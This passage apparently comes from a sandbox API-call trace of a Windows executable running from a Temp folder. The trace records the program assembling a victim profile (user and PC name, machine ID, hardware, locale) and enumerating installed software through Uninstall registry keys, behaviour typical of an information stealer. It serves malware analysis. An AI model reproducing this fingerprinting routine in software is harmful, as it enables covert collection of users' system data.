16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 " [0175.912] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001" [0175.912] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\n" [0175.912] RegCloseKey (hKey=0x354) returned 0x0 [0175.912] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x22, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-001A-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.912] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001A-0409-0000-0000000FF1CE}") returned 90 [0175.912] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-001A-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.913] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Outlook MUI (English) 2016", lpcbData=0x197fd4*=0x25) returned 0x0 [0175.913] lstrlenA (lpString="Microsoft Outlook MUI (English) 2016") returned 36 [0175.913] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Outlook MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016" [0175.913] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.913] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 " [0175.913] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001" [0175.913] 